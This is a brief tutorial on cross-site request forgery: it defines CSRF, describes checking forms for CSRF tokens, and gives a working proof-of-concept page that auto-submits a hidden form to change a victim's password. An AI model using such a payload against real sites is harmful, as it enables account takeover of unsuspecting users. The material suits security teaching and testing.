What is CSRF?
Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.

Check for CSRF Tokens:
CSRF protection usually involves embedding a unique CSRF token in each form. This token must be submitted alongside the form data and validated by the server to ensure that the request is legitimate and initiated by the user.
Inspect the HTML form for the presence of a hidden CSRF token field (e.g., <input type="hidden" name="_csrf" value="token_value">).
Review the server-side code or API documentation to confirm that CSRF tokens are expected and validated

How to perform

<html> 
  <body>
    <form  action="https://example.com/account/resetpassword/" method="POST">
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="confirmation" value="password123" />
    </form>
   <script>document.forms[0].submit()</script>
  </body>
</html>

then we will be sending this malicious file to the victim and when he clicks on the file his password will be changed to "password123".